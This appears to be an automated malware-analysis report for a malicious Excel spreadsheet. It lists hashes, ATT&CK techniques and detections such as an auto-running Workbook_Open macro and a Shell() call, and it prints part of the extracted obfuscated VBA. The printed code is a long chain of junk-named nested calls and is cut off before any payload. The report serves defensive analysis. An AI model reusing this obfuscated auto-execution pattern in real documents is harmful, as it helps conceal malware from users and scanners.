Office (OLE) malware analysis — malicious · 0ebfbcbf8c35ff8c

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-02-12 19:41:34 Authoring application: Microsoft Excel First seen: 2018-09-04

MD5: 73828f9d183d9d9004591767ef21da13 SHA-1: 8ab7fa25e9c8ec1b5cfc275da5592c6068c214fc SHA-256: 0ebfbcbf8c35ff8cbf36e38799b5129c7b70c6895d5f11d1ab562a511a2ec76e

228 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Excel file containing a Workbook_Open macro that executes obfuscated VBA code. This code utilizes the Shell() function, indicating an attempt to run an external process. The presence of the ClamAV signature 'Xls.Malware.Valyria-10036513-0' strongly suggests malicious intent, likely to download and execute a second-stage payload.

Heuristics 6

ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21295 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	21295 bytes
SHA-256: `00388ed83bd16984c9a65ae9b925805080c0f491319a92c2a9913381cfb2616b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Static Sub workBOok_oPeN(): Call yedhu: End Sub Function yedhu() As Date Call fzfwx End Function Function fzfwx() As Variant Call tento End Function Sub tento() Call bzpir End Sub Static Sub bzpir() Call pfxfj End Sub Static Function pfxfj() As Currency Call wazum End Function Static Function wazum() As Object Call lghrd End Function Static Sub lghrd() Call sbkgg End Sub Function sbkgg() As Object Call ggrdy End Function Function ggrdy() As Long Call umyap End Function Sub umyap() Call chbps End Sub Private Function chbps() As Long Call qnimk End Function Private Function qnimk() As Date Call xilan End Function Private Sub xilan() Call lnsxe End Sub Private Sub lnsxe() Call tivmh End Sub Private Function tivmh() Call hocjz End Function Function hocjz() As Double Call ojfyb End Function Sub ojfyb() Call dpmvt End Sub Sub dpmvt() Call kkpkw End Sub Function kkpkw() As Date Call ypwho End Function Sub ypwho() Call fkzwq End Sub Sub fkzwq() Call uqgti End Sub Private Function uqgti() As Variant Call bljil End Function Private Sub bljil() Call igmxn End Sub Private Sub igmxn() Call xmtuf End Sub Private Function xmtuf() As Double Call ehwji End Function Private Function ehwji() As Single Call smdga End Function Sub smdga() Call zhguc End Sub Sub zhguc() Call onnru End Sub Function onnru() As Integer Call viqgx End Function Function viqgx() As Currency Call joxdo End Function Sub joxdo() Call rjasr End Sub Sub rjasr() Call fohpj End Sub Private Function fohpj() As Object Call mjkem End Function Private Sub mjkem() Call aprbd End Sub Private Sub aprbd() Call ikuqg End Sub Private Function ikuqg() As String Call wqbny End Function Private Function wqbny() As Boolean Call dleca End Function Sub dleca() Call rqlzs End Sub Sub rqlzs() Call zloov End Sub Function zloov() As Object Call xehns End Function Static Sub xehns() Call edsvn End Sub Static Function edsvn() As Object Call snhlx End Function Private Function snhlx() As Byte Call ymstt End Function Private Sub ymstt() Call fldco End Sub Static Sub fldco() Call mkokj End Sub Static Function mkokj() As Boolean Call sjzsf End Function Private Sub sjzsf() Call zikaa End Sub Private Function zikaa() Call ghviv End Function Private Sub ghviv() Call mggqr End Sub Static Sub mggqr() Call tfrzm End Sub Static Function tfrzm() As Integer Call aechi End Function Private Sub aechi() Call gdnpd End Sub Private Sub gdnpd() Call uncfn End Sub Static Function uncfn() As String Call bmnnj End Function Static Function bmnnj() As Single Call hlywe End Function Static Sub hlywe() Call okjez End Sub Private Function okjez() As Variant Call vjumv End Function Private Sub vjumv() Call bifuq End Sub Static Sub bifuq() Call ihqcl End Sub Static Function ihqcl() As String Call pgbkh End Function Private Sub pgbkh() Call vfmtc End Sub Private Function vfmtc() As Byte Call cexbx End Function Static Function cexbx() As Double Call jdijt End Function Static Sub jdijt() Call wmxzd End Sub Static Sub wmxzd() Call dlihy End Sub Private Function dlihy() As Long Call jktqu End Function Private Sub jktqu() Call qjeyp End Sub Static Sub qjeyp() Call xipgk End Sub Static Function xipgk() As Currency Call dhaog End Function Private Sub dhaog() Call kglwb End Sub Private Function kglwb() As Date Ca ... (truncated)

SHA-256: 00388ed83bd16984c9a65ae9b925805080c0f491319a92c2a9913381cfb2616b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub workBOok_oPeN(): Call yedhu: End Sub
Function yedhu() As Date
Call fzfwx
End Function
Function fzfwx() As Variant
Call tento
End Function
Sub tento()
Call bzpir
End Sub
Static Sub bzpir()
Call pfxfj
End Sub
Static Function pfxfj() As Currency
Call wazum
End Function
Static Function wazum() As Object
Call lghrd
End Function
Static Sub lghrd()
Call sbkgg
End Sub
Function sbkgg() As Object
Call ggrdy
End Function
Function ggrdy() As Long
Call umyap
End Function
Sub umyap()
Call chbps
End Sub
Private Function chbps() As Long
Call qnimk
End Function
Private Function qnimk() As Date
Call xilan
End Function
Private Sub xilan()
Call lnsxe
End Sub
Private Sub lnsxe()
Call tivmh
End Sub
Private Function tivmh()
Call hocjz
End Function
Function hocjz() As Double
Call ojfyb
End Function
Sub ojfyb()
Call dpmvt
End Sub
Sub dpmvt()
Call kkpkw
End Sub
Function kkpkw() As Date
Call ypwho
End Function
Sub ypwho()
Call fkzwq
End Sub
Sub fkzwq()
Call uqgti
End Sub
Private Function uqgti() As Variant
Call bljil
End Function
Private Sub bljil()
Call igmxn
End Sub
Private Sub igmxn()
Call xmtuf
End Sub
Private Function xmtuf() As Double
Call ehwji
End Function
Private Function ehwji() As Single
Call smdga
End Function
Sub smdga()
Call zhguc
End Sub
Sub zhguc()
Call onnru
End Sub
Function onnru() As Integer
Call viqgx
End Function
Function viqgx() As Currency
Call joxdo
End Function
Sub joxdo()
Call rjasr
End Sub
Sub rjasr()
Call fohpj
End Sub
Private Function fohpj() As Object
Call mjkem
End Function
Private Sub mjkem()
Call aprbd
End Sub
Private Sub aprbd()
Call ikuqg
End Sub
Private Function ikuqg() As String
Call wqbny
End Function
Private Function wqbny() As Boolean
Call dleca
End Function
Sub dleca()
Call rqlzs
End Sub
Sub rqlzs()
Call zloov
End Sub
Function zloov() As Object
Call xehns
End Function
Static Sub xehns()
Call edsvn
End Sub
Static Function edsvn() As Object
Call snhlx
End Function
Private Function snhlx() As Byte
Call ymstt
End Function
Private Sub ymstt()
Call fldco
End Sub
Static Sub fldco()
Call mkokj
End Sub
Static Function mkokj() As Boolean
Call sjzsf
End Function
Private Sub sjzsf()
Call zikaa
End Sub
Private Function zikaa()
Call ghviv
End Function
Private Sub ghviv()
Call mggqr
End Sub
Static Sub mggqr()
Call tfrzm
End Sub
Static Function tfrzm() As Integer
Call aechi
End Function
Private Sub aechi()
Call gdnpd
End Sub
Private Sub gdnpd()
Call uncfn
End Sub
Static Function uncfn() As String
Call bmnnj
End Function
Static Function bmnnj() As Single
Call hlywe
End Function
Static Sub hlywe()
Call okjez
End Sub
Private Function okjez() As Variant
Call vjumv
End Function
Private Sub vjumv()
Call bifuq
End Sub
Static Sub bifuq()
Call ihqcl
End Sub
Static Function ihqcl() As String
Call pgbkh
End Function
Private Sub pgbkh()
Call vfmtc
End Sub
Private Function vfmtc() As Byte
Call cexbx
End Function
Static Function cexbx() As Double
Call jdijt
End Function
Static Sub jdijt()
Call wmxzd
End Sub
Static Sub wmxzd()
Call dlihy
End Sub
Private Function dlihy() As Long
Call jktqu
End Function
Private Sub jktqu()
Call qjeyp
End Sub
Static Sub qjeyp()
Call xipgk
End Sub
Static Function xipgk() As Currency
Call dhaog
End Function
Private Sub dhaog()
Call kglwb
End Sub
Private Function kglwb() As Date
Ca
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.